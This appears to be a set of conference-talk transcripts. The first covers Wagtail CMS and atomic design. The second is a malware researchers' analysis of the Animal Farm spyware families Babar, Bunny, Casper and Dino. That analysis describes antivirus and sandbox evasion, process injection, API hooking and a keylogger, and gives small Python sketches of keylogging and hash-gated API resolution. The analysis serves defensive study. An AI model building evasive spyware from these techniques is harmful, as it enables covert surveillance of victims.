little bit more right here, actually. So, StreamField: if we know that the StreamField exists on that page model as just JSON-formatted text, we can think of each one of these blocks as different types, and C comes before B comes before A. So every time you render, each JSON object is in an order, right? And these things are orderable, too, so you can actually move the different blocks around if you want. So let's just say C is a person block that has a name, a date of birth, and a biography. The biography could just be something like a rich text block, but maybe we want to do something else, too: we want to put in a heading, then the body is the rich text block, and then we add an image for that person, like a headshot or something like that. This was just a really simplified page, but what is really important here is just this: you're just accessing each block as a collection on page.body, which is a StreamField, and then just rendering that block. And really, that's all you need; and sure, you can do really custom things, like accessing block.block_type, which will give you that string that you gave as an argument in the beginning in that tuple, so you can render it in a certain way given certain conditions, or whatever you want to do.
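One possible shape for that person block, again as a sketch: the field names follow the ones mentioned in the talk, while the image block import, icon, and template path are assumptions.

    from wagtail.core import blocks
    from wagtail.images.blocks import ImageChooserBlock

    class PersonBlock(blocks.StructBlock):
        name = blocks.CharBlock()
        date_of_birth = blocks.DateBlock()
        biography = blocks.RichTextBlock()
        headshot = ImageChooserBlock(required=False)

        class Meta:
            icon = "user"
            template = "blocks/person.html"

    # In a Django template, the whole stream renders in order, one block at a time
    # (with {% load wagtailcore_tags %} at the top of the template):
    #
    # {% for block in page.body %}
    #     {% include_block block %}
    # {% endfor %}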
And so what's really happening here is that this person block, made up of all these different other blocks, is calling this render method (and this is somewhat of an oversimplification, this isn't exactly code that you might use), but then you have this person.html template that you're declaring in that block class. So once it gets to value.biography, it will then call the biography's render function, which will do the exact same thing. So what's really great here is that you're able to actually modularize the entirety of your content, instead of just having this big blob of HTML. So, just to step back and do something else for a little bit: does anybody actually ever have documentation, or some sort of workflow with their designers, in which they're actually mapping their designs for the website you're building onto back-end code? Nobody? Nobody does that. Okay, cool. So, atomic design was thought up by Brad Frost, and this link, I'm pretty sure, is to the article that he wrote on it. It's a whole book, an ebook you can download, you can buy, or you can just read it online. But essentially it's just a philosophy, a way of thinking about how we can combine the different modules and design on your site into really consumable pieces. I'm going to go over this really quickly; I'm not a designer, I'm just trying to explain how we can integrate this. So, really, five levels: atoms, molecules, organisms, templates, and pages. I realize that this isn't exactly a great analogy, with biology and then templates and pages, but this is how they've defined it. So an atom would be something simple, something like a button or maybe even just a heading. Molecules are a combination of atoms. Organisms are a combination of maybe multiple molecules, maybe molecules and atoms; however you want to define that within your own reasoning, sort of guided by Brad Frost's atomic design. Templates would be everything together (you can think of it as just your Django template or something), and a page is where you have all the content. So that's just a really brief, really oversimplified overview of what atomic design is. So when you're using Wagtail with atomic design, which is something that I've been working with for the past year or so, you're going to map all of these blocks, these StreamField blocks that I've told you about, to your atoms, your molecules, your organisms. And then you're going to combine them in your page type to be able to render all of your different components consistently, so your design is continuously pervasive through everything that you're developing. So this is an example of atoms.py, where you have your heading and it just inherits from CharBlock. It uses the title icon, and then it uses the template atoms/heading; and it could be something as simple as just using an H1 tag, or it could have extra classes that you want to put on there. It all depends on your use case. And then we have the same thing for a hyperlink. That may be a little bit more complicated, because you could have different markup for external links or whatnot. And then we just do the same thing with molecules. But again, since all atoms can be inside molecules and so on and so forth, we're going to just reuse these components.
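A sketch of how that elements layout might look in code; the file names and block names are illustrative, not the speaker's project.

    # elements/atoms.py -- the smallest reusable pieces, each tied to one template.
    from wagtail.core import blocks

    class HeadingBlock(blocks.CharBlock):
        class Meta:
            icon = "title"
            template = "atoms/heading.html"   # could be as simple as an <h1> with classes

    class HyperlinkBlock(blocks.StructBlock):
        text = blocks.CharBlock()
        url = blocks.URLBlock()

        class Meta:
            template = "atoms/hyperlink.html"

    # elements/molecules.py -- molecules reuse atoms, so a change to the heading
    # template shows up everywhere a heading is used.
    class CardBlock(blocks.StructBlock):
        heading = HeadingBlock()
        link = HyperlinkBlock()

        class Meta:
            template = "molecules/card.html"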
So every time you want to put a heading somewhere, you're going to reuse that in your molecules. And so you don't have to worry about multiple changes or anything like that, like, randomly in this page we have this blob of HTML where we have to change this H1, and oh wait, we have to go over here and change this H1 too. It's all going to be changed right there; it's all just rendered exactly the way you want it. And it's also only going to be rendered at runtime, so even if it's the same heading content, you're still going to get that change whenever you want to make it. And so we do the same thing with organisms (we've seen this before), and then we have a StreamField where we combine all of this together. So again, we've got this really continuous, pervasive design specification in our code. And not only that consistency, but we also have a mapping to our designs, where they have tons of documentation, because designers love documenting, and they love understanding exactly how these components interact with each other or have these different actions. And then we can say, oh, that's the exact component in the back end that does that. And that's something I've never seen before. So this is a really cool way to actually organize all these things, and it improves ramp-up time for new folks, or whoever, to be able to understand which maps to what. And so this is just the sort of project file structure setup that I did. Essentially, in my project I put these in this elements folder, I put all of my atoms, molecules, and organisms there, and then in my models down here, I'm going to be putting all my page types. Actually, in my project I have a models folder in which I have all the different pages that I've created. So, a couple more thoughts. Wagtail is really cool. It has that awesome StreamField feature, among many other features. And it's something that I've always heard from other people, content editors, really anybody, that it's just such a joy to use. It's a great replacement for something that is really unusable, or not really intuitive. We replaced WordPress with Wagtail, and our content editors were just about jumping with joy. I mean, they were really, really excited about it. And if you go to madewithwagtail.org, you can see all the different websites that Wagtail's powering. There are, I think, parts of NASA, there's consumerfinance.gov, which is the CFPB site, there's the Peace Corps. So it's not just some brand new technology that no one's ever used; this is actually pretty proven. So I definitely encourage you to go and at least try it out, see what these features are like, and see if maybe you can incorporate it into your own design workflow. So that's it. Thanks. Oh, thank you. Good, we've got a few minutes for questions. So my question concerns image versioning and multimedia asset versioning. Is there any facility to version images and assets so that they can be sort of updated on their own, affecting all pages? That's actually an interesting question. I don't think I know enough about exactly how these images are handled; essentially, each image or document or whatever has its own ID in the database, so if you update that ID, it's going to be changed throughout the whole thing.
I don't know about versioning for images. There is such a thing in Wagtail, which is actually one of the greatest things about it that I'm sorry I didn't even mention, and that's the versioning of pages. Every time you save a page, that gets saved as a revision object, so you can reference that object. That isn't something that images have. I don't know if that entirely answers your question. It does. Okay. And I have another question, but I'm going to defer and ask it later. Okay, thank you. I think we've got time for one more question. Yeah, so my question is basically concerning, say you have an existing site that has a user profile page or something like that. So I guess this is around integration: you want to integrate Wagtail into the site. Is it possible, and if so, how hard would it be to make it so that the Wagtail articles, say one of them has an author, would show that user profile information from the existing site? Does it integrate well with models that exist already? Yeah, it already uses that whole users table and everything, so that's going to automatically be there. When you go into the Wagtail admin, you go to the users and it's just going to be there. Okay. That's my experience. Okay. And how does the code actually hook up; does it just use get_absolute_url, for instance, if it links to their profile, or is it something you customize yourself? I'm sorry, I don't think my answer is entirely correct about user profiles; I don't know about that. I think the users themselves are going to be connected, but I haven't had experience with connecting the user profiles. Okay, sorry about that. Oh, no problem. Yeah. Thank you. All right, just one last quick point to make. First of all, thank you, Kurt, for your amazing talk. Thank you so much. Of course, can you live. Yes, I can.
|
WHAT IS WAGTAIL Wagtail is a Django-based CMS made by developers that were just sick of the current solutions out there for reasons from usability to extensibility. It provides a sleek and intuitive editing experience, while keeping its design open and flexible for creating custom frameworks. I'll first explain what Wagtail is, how we can use it, what features make it great, and what makes it not so great. ATOMIC DESIGN Brad Frost coined this term in reference to his taxonomical design model. The model breaks down design layouts from the simplest element to the more complex layouts. I'll briefly go over what this model is. ATOMIC WAGTAIL Atomic design lends well to the strengths and some features of Wagtail. I'll tell you how you can use Atomic design in harmony with Wagtail, with tips and pitfalls you might encounter along the way. LESSONS LEARNED Any new approach to something is going to be both fun and frustrating. I'll list some of the most frustrating aspects of Wagtail, trickled with some advice.
|
10.5446/32803 (DOI)
|
So, hello everyone. Good morning. Thanks for being here. My name is Joan Calvet. I'm a malware researcher working at ESET, and I'm here on stage with Paul Rascagnères, wearing pink. I don't know why, but, I'm a malware researcher at G DATA, a German antivirus company. Hello. My name is Marion. Paul's name is Pink because I don't like pink. I'm a malware researcher at Cyphort, which is a US company. I'm working there as a threat researcher. And today we're going to present you our topic, Totally Spies. Yep. So this whole story basically started a few months ago, actually last year, because of this. You may have already seen this slide. It's part of a presentation that was leaked by Edward Snowden in 2014. It was first mentioned by the French newspaper Le Monde in March 2014. And so basically, as you can see, these slides were made by the Communications Security Establishment of Canada, the CSEC, which is the NSA of Canada, basically. And so they describe on the slides what they call Operation Snowglobe. That's the description of a group of attackers that they have seen in the wild and that they have tried to track, basically. So they describe the group, and one of the striking pieces of information inside the slides is on this slide, where they basically assess with moderate certainty that this Operation Snowglobe has been put forth by a French intelligence agency. They actually provide very few technical details, but there are a few of them, and that's on this slide, basically, where they describe one malware used by the group behind Operation Snowglobe, which is called by the developers, apparently, Babar, and they also have a developer username, probably from the debug path. And that's basically where we decided to let the hunt begin. Awesome. So I'm not sure if many of you know this picture, or the picture of these three girls. That's a children's cartoon named Totally Spies. These are the three spies. You can imagine these are our characters today, telling you about Totally Spies malware. Again, this was not my idea, this was Paul's idea; just to mention that, because he's the only one of the three of us who has little children. Anyway, all right, let the hunt begin. So how did the hunt begin? As you know, every good article about APT malware starts with a timeline, because apparently that's the most important thing when talking about malware. Anyway, our timeline is going to show you the different families we found. The time on the timeline is when they were created, or when we believe they were compiled, and the order in which they appear is the order in which we found them. So the first thing that we uncovered was NBOT, or TFC, or NGP; we're not really sure what to call it, the malware contains a lot of strings with NBOT in them. These are denial-of-service bots, which are quite simple and were compiled around 2010. They were not interesting at all, but they led us on to find the Bunny malware, which was a lot more interesting, which was probably compiled around 2011; or we actually know that it was spread in 2011. The next thing we found after Bunny was Babar. So yes, we uncovered Babar. French media were very, very happy, it was funny, to have someone to speak about Babar the malware. But Babar was not the last thing we found. So after Babar, there were more cartoons popping up, and we eventually uncovered Casper. Casper is reconnaissance malware, which was spread in Syria, interestingly, through a watering hole attack in 2014.
And not even Babar was the last thing, but the newest cartoon character that we found was Dino, which was spread around the same time, in the same area. So today, we're going to present all these different characters. All right. As I start: how did we get onto this malware? The first thing we had, as I mentioned, was NBOT. And you see on the slide, I'm very sorry that I put an IDA Pro screenshot on the slide, I was told I shouldn't do this at RECON, but I still dare to do it, just to show you how simple the bot itself was. So obviously, it is a denial-of-service bot. It's flooding all sorts of things, and it had these strings in clear text in there. So we have the denial-of-service bot, which comes in pretty much clear text, or let me call it a plain binary, unencrypted, unpacked. And I should say I come from the antivirus scene. I started off as a junior analyst at an antivirus company, and I would have been very excited to see such a bot, because I could create great signatures. The thing is, if you try to build a botnet and you spread your bots, you might want to prevent someone from detecting all your bots with one single signature, just an idea. So this was quite interesting. But what was more interesting is that these bots had CNC servers that were sinkholed by Kaspersky. And Kaspersky, on their sinkholes, provide an email address that you should write to if you have any questions about why this specific domain is sinkholed. So I wanted to write an email there and say, hey, why are you sinkholing my CNC server? And I was very surprised when, within the next 20 minutes, I got an answer from their team: oh, this is interesting that you have this, I'm not really sure what it is, but could you tell me where you got the binary from, which computer was infected, who owned that computer, which company was the computer in, and how did you get onto this binary? And I was like, oh, this is fishy. So this was the first impression I had. And after a while, as I asked around about what kind of bot this is, a friend of mine came up to me and told me to look at something else: there were other binaries with similar structures in there, using similar techniques, while being quite different. Anyway, so this was the first step towards the next cartoon, which was Bunny. So after digging a bit, I found a dropper which came with a PDB string embedded, telling me the project name, Bunny 2.3.2. And I'm not specifically a fan of bunnies, but I thought it's very cute. Digging into the binary, I found out it's a very interesting malware. Digging further, actually based on the hashes of these binaries, I found out they were already mentioned online on a blog which documents a spearphishing campaign that happened in 2011. So I went to ask the blog writer, how did you get these binaries, what kind of spearphishing was that, and how did it work? And he didn't really give me any answer; I don't know why he didn't share any details about the spearphishing campaign. But what he said was: oh yeah, these binaries, I haven't looked at them closer, but I was told it's the French government spreading them. And I was like, oh wow, okay, this is even more fishy. So this was the first time I heard about the French government. Anyway, what is Bunny? Bunny is a scriptable bot. Bunny incorporates a Lua engine and can download and execute Lua scripts, executing the Lua with the engine and instrumenting the C++ code of the binary. Let me show you how this is built.
So Bunny is beautifully multithreaded. It has a main thread, which is busy with command parsing from the CNC server and execution of the scripts. These scripts are loaded from different text files, which are placed on disk. So the command parsing does nothing else than parse one file after another, load the Lua scripts in there, and execute them in dedicated threads. So the entire bot was built to execute Lua scripts. These Lua scripts would be dumped into the text files by different hero threads. This is not a term that I came up with; this is a term which is defined in the binary. The binary calls its worker threads, literally, hero. Of these hero threads, hero zero is one that doesn't actually download and dump scripts; I was never too sure what the purpose of hero zero is. But the other three are busy with fetching scripts: one through HTTP, like a plain download of scripts; hero three would load scripts from a file which was downloaded from an HTTP server; and hero two, interestingly, would place cron tasks, meaning it would configure tasks to be scheduled at specific points in time. Also, cron task is a term that, again, was defined by the binary authors. Anyway, this is basically the workflow: download scripts, then execute and inject them into the Lua engine. At the same time, the commands received from the CNC and the actions the bot would take would be dumped to a text file. This text file was managed by a thread called the backfile thread. Altogether, the bot of course had a performance monitor to execute the Lua. What is it, though, with the Lua threads? So there are some theories. Lua is originally designed for computer games. With Lua, you can inject behavior into a computer game, like bombs exploding, or letting things happen all of a sudden, unexpectedly, in a given context. So my first theory is that the bot downloaded the scripts to instrument its own code and to inject behavior through text files into the binary. So what Bunny would do was not download other binaries as plugins to execute behavior, but download Lua scripts to instrument its own code and change its behavior on the fly. Another interesting thing is that by downloading Lua scripts, you're not actually downloading binaries. You don't have to execute binaries on disk, you don't create a new thread every time you want to inject behavior; you only download a plain text file, which is rather small and doesn't catch any attention, and you can still inject any behavior you want into the binary. So that was pretty smart. What was also interesting about Bunny is what I call the slight rabbit armoring. It wasn't really armored, but it came with some interesting anti-analysis tricks. What was interesting for me is that it had a lot of them, which is uncommon for the usual APT malware I see. Anyway, altogether they were pretty simple. Let me just count them down. So, it did an emulator check: it would check the module path of the executed module to see if it contained any strings indicating an emulator. I think Paul is going to explain this in more detail later. It would check the directory name from which it was executed, to see if it was the directory the dropper had created before, to see if the payload was really dropped by a legitimate dropper. This might seem simple, but it works against most sandboxes to evade execution. It would change the timestamp of the payload to the system installation date.
It would check if the number of running processes was bigger than 15, which is not the case if you run in a simple emulated environment, like, for example, an antivirus engine emulator. It would check if time APIs were hooked, which happens if you turn on certain analysis plugins that hook the GetTickCount API. It would obfuscate a subset of APIs: it would load that subset of APIs dynamically, indicated by a hash in the binary. Interestingly, this hashing function is really simple, is revertible, and is shared across most of the cartoon malware; it's Paul who is going to speak about this again later. What was smart is that they don't load all the APIs dynamically, but only the ones that indicate the final behavior: APIs for interaction with the registry or APIs for interaction with the file system were all obfuscated. I think this was for evading analysis that only looks at the import table. It's a pretty simple trick, but it might be effective in some cases. Another thing was the infection strategy. Is that me? The infection strategy, which would check which antivirus was installed on the machine and then decide on a specific technique: whether to inject into an already existing process or create a new process and inject the payload there, or whatever, which requires a lot of knowledge of how dedicated antivirus engines work and what kind of infection strategies would work against them. Last but not least, and I was not sure if it's a bug or a feature, was an evasion trick for sandboxes, where the final payload would not be loaded without a reboot of the machine, because the dropper lacked any functionality to invoke the payload. I have discussed this a lot with other people. It's pretty effective against a sandbox, because you would really need to reboot the machine. The persistence mechanism was through the registry, so there was a registry key which invoked the Bunny loader, but the thing is, the Bunny dropper would not delete itself after dropping the payload. The Bunny dropper was executed, would place the payload, would create the registry key, and then nothing would happen until the user rebooted the machine. Then the payload would be invoked through the registry key and would delete the dropper. I'm not really sure if this was intentional or if they just forgot to invoke their payload. Anyway, this was Bunny. After Bunny, we were really excited; this is cool malware. And we found out that there was something else that had been documented in the media already. There was Babar. Bunny, Babar: there are animal names in this malware, so we thought, okay, we have to be searching for Babar. And finally, really, we found Babar. I don't know if everyone's familiar with Babar. Babar is a French cartoon character, an elephant. It was first mentioned by Le Monde in an article in 2014 where they're speaking about the Snowden slide I mentioned; they're talking about Babar. I personally call it my pet, my persistent elephant threat. Babar is espionage malware. It does keylogging, it steals screenshots, it does audio captures, everything a good espionage tool should be doing. It does this by thoroughly invading the Windows machine. Let me tell you in advance, Babar is not a really sophisticated malware, but it does its job very well. Babar works through a main instance and two child instances as a backup, and hooks APIs in remote processes to steal data that enters these APIs on the fly, and exfiltrates this information to its CNC server.
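To make that import-by-hash idea concrete, here is a generic Python illustration. The toy hash below is NOT the actual algorithm shared by these families; it only shows the pattern of storing a hash and resolving an API name from it at runtime.

    def toy_hash(name):
        # Simple rolling hash, purely for illustration
        # (the real one is described in the talk as simple and reversible).
        value = 0
        for ch in name:
            value = ((value * 31) + ord(ch)) & 0xFFFFFFFF
        return value

    def resolve_by_hash(export_names, wanted_hash):
        # Walk a module's export names until one hashes to the stored value.
        for name in export_names:
            if toy_hash(name) == wanted_hash:
                return name
        return None

    exports = ["CreateFileW", "RegSetValueExW", "GetTickCount"]
    print(resolve_by_hash(exports, toy_hash("GetTickCount")))  # -> GetTickCount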
Let's have a look. I prepared another beautiful slide outlining the operation. Babar is a DLL which is loaded through a registry key that invokes it via regsvr32.exe. It will then inject itself into a process running on the desktop, which is randomly chosen; this is the main instance, which will then go on to infect two child instances. These are used as backup only. So if the main instance in an infected process dies, one child takes over and creates a new child, to guarantee persistence. So this main instance takes over most of the functionality. It does keylogging, it steals data from the clipboard, it steals names of running processes, it steals names of desktop windows that are open. Nothing really exciting. But what it also would do was, as I mentioned, hook into other processes. So the main instance would load itself, the DLL, into other processes through a global Windows hook, and hook itself into the message chain of the running application, to be able to do its inline hooking. The processes of interest were identified through the configuration. So if, for example, Microsoft Word was opened, the Babar DLL would take action and place inline hooks on the dedicated APIs it was interested in. The API hooking was performed with the Microsoft Detours library. So, I'm a rather young reverse engineer; I hadn't heard of Detours before, but other people were laughing at me because Detours is from 1999. So yeah, our authors are nostalgic. So as I mentioned, it works very well. Let's have a closer look at how that works. So first of all, what I found interesting was the process invasion that Babar performed. It loads the DLL, as I mentioned, and injects it into running processes, and it used a section object to deliver information to the child instance, to the infected instance, containing the pipe name, the number of instances, and the export name to be called. It would then allocate memory in the target process and copy a stub function there, which was used to create a remote thread, which would then load the Babar DLL and call the indicated export name. And then the DLL would run happily in the context of the infected process. With this technique, Babar could invoke any of its exports by just injecting its DLL into another process and then calling any of the exports it had, and thus calling the dedicated functionalities. This was, for example, how the CNC communication was performed. The CNC communication is located in one specific export. So if Babar wanted to communicate with its CNC server, it would create another child instance with a call to the CNC functionality, hand over the data which should be communicated, and then run the DLL in the context of another process. The second thing I thought was interesting was the keylogger. So the keylogger Babar used was the most simplistic keylogger one could implement. It would create an invisible, message-only window, which would then, in its message dispatching, create a raw input device, which was then used to filter for input window messages. I wrote the specific settings here on the slide. It would then call GetRawInputData to receive the data the input device captured, and then just translate the virtual key to a character and write it to a file. So this is probably the most simple keylogger you could write. You can find this documented in a Code Project article which is titled something like, yes, Simplistic Keylogger or Simple Keylogger. So congratulations to our authors.
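The raw-input plumbing itself (the message-only window, RegisterRawInputDevices, the WM_INPUT handling) is too long to reproduce here, but the final step just described, turning a captured virtual-key code into a character and appending it to a log file, can be sketched in a few lines. MapVirtualKeyW is a real Windows API; the list of captured key codes below is a made-up stand-in for what GetRawInputData would deliver.

```python
import ctypes

MAPVK_VK_TO_CHAR = 2
user32 = ctypes.windll.user32

def vk_to_char(vk):
    # MapVirtualKeyW translates a virtual-key code into a character value
    # (0 if the key has no printable character, e.g. SHIFT or the F-keys).
    ch = user32.MapVirtualKeyW(vk, MAPVK_VK_TO_CHAR) & 0xFFFF
    return chr(ch) if ch else ""

captured = [0x48, 0x45, 0x4C, 0x4C, 0x4F]   # pretend WM_INPUT gave us these codes
with open("keylog.txt", "a") as log:
    log.write("".join(vk_to_char(vk) for vk in captured))   # appends "HELLO"
```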
The third thing, and the last thing I actually wanted to describe, was how Babar hides in plain sight and tries to evade being seen, which is the user-land rootkit functionality, or, never mind, call it a user-land rootkit. What does it mean? Babar hooks target functions, or rather hooks function calls to specific target functions, which were APIs in our case, and it does this through the Detours library; it literally uses code from the Detours library to place inline hooks. How is this performed? Babar overwrites the first few bytes of the target function to point to a detour function, which performs the malicious functionality. So in the detour function, Babar would steal the data which was going into an API, or steal the data which was returned from an API, and then, either before or afterwards, call the legitimate API, to hide the hooking and to deliver the right return value to the calling process. So from the source function, the execution flow jumps to the detour function for that functionality, and then goes to the trampoline function, which contains the overwritten bytes from the target function. The trampoline function makes sure that the final function call can happen after all, and then hands execution to the rest of the target function, which then returns to the detour function, and from there back to the caller. So, after all, this is silently stealing data at runtime from a running process, without the running process noticing it. This is called a hook. Babar does this for internet communication, file creation, and audio streams; these were the specific APIs it would hook. After all, Babar is a tool that does its job. It's not very sophisticated, and as we published about Babar, people were coming out asking us: do you really think it is anything like Regin? Is it anything really, really sophisticated? And I was dying when I saw a quote from Paul, when he told people that if you compare Regin and Babar, keep in mind that a Pischo is not for the day-to-day life. And, just, are you listening to me? Yeah. For information, French media covered it a lot when we published our papers, and the first question of every journalist that called me was: is it the French government? First question. And the second question, I don't really know why, but all the journalists asked me if it's more complex or less complex than Regin. And a lot of journalists in the French newspapers made some joke about the potential French developers, because it's less evolved than Regin. So that's why I bring these things up. Okay. So the next one we found is Casper. So as Marion said, unlike Babar and Bunny, Casper is simply a reconnaissance tool, a first-stage malware for the group. And among the samples we got, there is a DLL where the developers forgot to remove the original file name from the export table. It has been developed in C++ like most of the Animal Farm malware. And it has been deployed at least in April 2014 on a few people in Syria, thanks to a Flash zero-day exploit. And interestingly, the exploit, the Casper binaries and its CNC server were all hosted on one machine in Syria that belonged to the Syrian Justice Ministry. But we believe the group behind that, which is called Animal Farm as you may know, simply hacked the website to use it as storage. So the first thing that Casper does when it arrives on the machine is decrypt its configuration file, which is an XML file.
And it contains in particular instructions on how to deal with antivirus software that could be running on the machine. And they call it a strategy. And you can see here at the top there is a STRATEGY tag that defines the default strategy, and inside this STRATEGY tag there are some AV tags defining strategies for specific antivirus software. And so at runtime, Casper checks which antivirus runs on the machine and applies the corresponding strategy, or the default one. And so what's a strategy? It's basically a set of parameters that define either how to perform certain actions on the machine, or whether certain actions should be performed. So for example, the autodel parameter defines how the Casper dropper will remove itself from the machine after having dropped the payload. And you see here that for Bitdefender, the autodel parameter is set to API, which means this action will be made through the Windows API function MoveFileExW, to register a file to be deleted at the next startup. But if you run Avast antivirus, in this case the same parameter is set to WMI, which means the same action will be performed differently. And in this case, it will be through a command line that will be decrypted and then executed in a new process. The command line is just a loop that tries to remove the dropper until it works, and the new process is created through a WMI request. So that means that the Casper developers have an in-depth understanding of how each antivirus product monitors the machine. And they implemented a bypass for each one of them, and for each noisy action that Casper has to do, which is kind of a lot of effort. The next thing that Casper does: it receives some commands inside the configuration file. And in particular, there is the install command to drop the payload and make it persistent on the machine. There are two versions of the payload provided, one for 32-bit machines in the x86 tag and one for 64-bit machines. An interesting detail here I would like to insist on is that the Casper dropper gives an input parameter to the payload, and this input parameter has to have one exact, specific value for the Casper payload to run normally. And the way it is implemented is actually pretty subtle. It's not a simple check at the beginning of the execution of the payload. No, it's done in this function in the Casper payload. It's basically the function in charge of finding API addresses in memory, so it's a GetProcAddress, basically. But they don't use the name of the API function; they use a hash, a four-byte hash calculated from the name. And interestingly, the first thing that this function does is a XOR between a hardcoded four-byte constant, a variable I named checksum, and the hash given as input to the function, the hash to look for. And where does the checksum come from? It's the result of a few arithmetic operations done on the input parameter of the Casper binary. So let's say the checksum is not equal to the hardcoded constant. Then the XOR will not be equal to zero, and the hash to look for, defined in this line, will not be equal to the hash given as input to the function, which is the correct hash to look for. So in this case, this GetProcAddress will not retrieve the correct API function, because it does not look for the correct hash, because the right input value was not provided to the Casper payload, the value such that the checksum is equal to the hardcoded constant. So we have to provide to Casper this exact value, such that it will execute normally.
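A simplified model of that trick, with made-up constants and made-up arithmetic for the checksum (only the XOR gating reflects what was just described): unless the dropper passes the one input value that makes the checksum equal to the hardcoded constant, every lookup silently resolves the wrong hash.

```python
HARDCODED_CONSTANT = 0x1B27F3A9            # hypothetical value baked into the binary

def checksum_from_input(input_param):
    # stands in for the few arithmetic operations done on the dropper's argument
    return (input_param * 3 + 7) & 0xFFFFFFFF

def resolve_by_hash(wanted_hash, export_hashes, input_param):
    checksum = checksum_from_input(input_param)
    # the hash actually searched for is perturbed unless checksum == constant
    effective = wanted_hash ^ (checksum ^ HARDCODED_CONSTANT)
    return export_hashes.get(effective)

exports = {0xDEAD1234: "CreateProcessW"}   # pretend hash -> exported API name

# the one good input solves checksum(input) == constant for the toy arithmetic
good_input = ((HARDCODED_CONSTANT - 7) * pow(3, -1, 2**32)) % 2**32
print(resolve_by_hash(0xDEAD1234, exports, good_input))      # CreateProcessW
print(resolve_by_hash(0xDEAD1234, exports, good_input + 1))  # None -> random crash later
```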
And if you don't provide that value, you will get a random crash, because at some point it calls the address retrieved, and it's not the correct address, so there is a weird crash inside a Windows API. So that's a technique to make the analysis of the payload, without having the dropper, difficult, because you have to find this exact input value such that this line will have no effect. So once Casper is executing normally on the machine, it builds a very detailed report on the machine, and you can see an extract here. And this report is sent back to the CNC server, which can provide in answer an XML file, once again containing commands. And in particular, they can deploy a second-stage binary at this stage. We don't have any second-stage binary, because the CNC was down when we started investigating Casper. So that's it for Casper. And now it's time to talk about Dino, and as far as we know, this is the first time that Dino is publicly documented. So Dino is more in the category of Babar and Bunny. It's an espionage backdoor, a second-stage malware. It has a lot of features, including the ability to do some complex file search requests. The operators can ask the Dino malware: give me all files with a doc extension whose size is greater than a certain amount of bytes and which were modified in the last few days. And that's probably the end goal of Dino: exfiltrating information from the target. We got only one sample of Dino, actually, and this sample was deployed in Iran in 2013. It is developed in C++ with a clean modular architecture. There is no RTTI inside the binary, but there are a lot of verbose error messages, like this one, for example. And once again, they forgot to remove the original file name from the export table. So I list here the modules that we got in our sample, with the names given by the developers. First there is a PSM module which maintains an encrypted on-disk copy of all the modules of Dino. Then the core module contains the configuration. The crontab module allows the operators to schedule tasks, with a syntax that is almost exactly the same as the cron UNIX command. Then there is the FMGR module to upload and download files onto the machine, whereas cmdexec and cmdexecq are managing the execution of commands on Dino. And finally, they got a module that they call envvar, that stores Dino-specific environment variables. So now I'm going to dig a little bit into technical details in Dino. So one of the important things when analyzing Dino was to understand a custom data structure that they use everywhere, basically, and in particular to store the content of the modules of Dino. The developers called this structure a data store, and that's a map from strings to values. These values can have eight possible types. Some of those types have a fixed size, like byte, short, word; some of those types have a variable size. And the type names here, they also come from the developers, because in Dino there is a function to print a data store nicely, and it prints in particular the names of the types. So for example, here is the result of printing the data store that is inside the core module, and it contains the configuration of Dino. So that's really the output of the print function that is inside Dino. So you can see on each line the key, the value associated with the key, and the type of this value. So how are these data stores implemented, actually? As I said, it's a map, and they implemented it as a simple hash table.
So in memory, in a data store object, the first field is a pointer to an array of four entries, and each entry starts a linked list containing key-value pairs. So in order to access a key, there is a hash function that is used: you hash the key, you get a number, take that number modulo four, and it gives you the index in the array where the linked list possibly containing your key starts. So for example, in this simplified view, the hash of the key IP is three modulo four, so the linked list containing the key IP starts at index three. They fixed the number of buckets to four, the size of the array to four, which makes this data structure not really efficient, because there are a lot of collisions, a lot of keys with the same index in the array, and the linked lists grow really fast. Another thing to know about data stores is that they can be serialized, and they have a custom format to serialize the data store. A serialized data store looks like this: it begins with a magic DWORD, DXSX in big-endian, then a suspected version number, then the number of stored items, and then the serialized items themselves, first the key, its length, its name, and then the actual value, its type, and the value. The serialized data stores are used in particular in the PSM module that maintains the up-to-date copy of all the content of the modules. And it is done inside an encrypted file, and this is, by the way, the RC4 key they use to encrypt the file, so we can admire the leet speak of the developers. And so, yeah, that's it for data stores. Just to conclude on the data store: I think the data store is a custom data structure, but if you recognize it, by the way, I would be very happy to know. An interesting thing also inside Dino is a module that the developers call ramFS. It's also present in other Animal Farm binaries, and like the name implies, it's a temporary file system that can be mounted in memory from an encrypted blob that is initially inside the configuration. So once it's mounted in memory, ramFS remains stored as encrypted chunks of data; it's a set of encrypted chunks of data, and the chunks will be decrypted only on demand. And in our Dino sample, ramFS initially contains one file that the developers call the cleaner file, and it contains instructions on how to remove Dino from the machine. So to give you an idea, here is the code that is responsible for executing the cleaner file, when the operators want to remove Dino from the machine. So the first thing it does is to look for the name of the cleaner file, which is inside the configuration. And you can see at the bottom that, once again, they provide very verbose error messages, so we know basically what the purpose of each check is from the error message. So if they found the name of the cleaner in the configuration, then they look for the cryptographic key to decrypt the ramFS initial blob in the Dino configuration. And you can see that they call this key the passphrase, so they are really in the file system mindset. And then if it works, there is the actual mount operation, which is basically creating a C++ object in memory that contains the file system. And if the mount works, then they execute the cleaner file which is inside ramFS. So how is ramFS actually implemented at the low level? So in memory we got this ramFS object, and as I said, ramFS is a set of encrypted chunks.
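For the sake of concreteness, here is a minimal Python model of that four-bucket map: just the shape of the structure described above, with an arbitrary toy hash standing in for the developers' actual hash function.

```python
class DataStore:
    """A map from string keys to (type, value), kept as 4 linked-list buckets."""
    BUCKETS = 4

    def __init__(self):
        self.table = [[] for _ in range(self.BUCKETS)]   # 4 entries, each a chain

    def _bucket(self, key):
        h = 0
        for c in key:                     # toy hash; the real one is not shown here
            h = (h * 31 + ord(c)) & 0xFFFFFFFF
        return h % self.BUCKETS           # hash modulo 4 -> index into the array

    def put(self, key, typ, value):
        chain = self.table[self._bucket(key)]
        chain[:] = [(k, t, v) for (k, t, v) in chain if k != key]
        chain.append((key, typ, value))   # chains grow quickly with only 4 buckets

    def get(self, key):
        for k, t, v in self.table[self._bucket(key)]:
            if k == key:
                return t, v

    def dump(self):
        for chain in self.table:
            for k, t, v in chain:
                print("%-12s %-6s %r" % (k, t, v))   # mimics Dino's print function

ds = DataStore()
ds.put("IP", "str", "192.0.2.1")
ds.put("PingDelay", "dword", 3600)
ds.dump()
```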
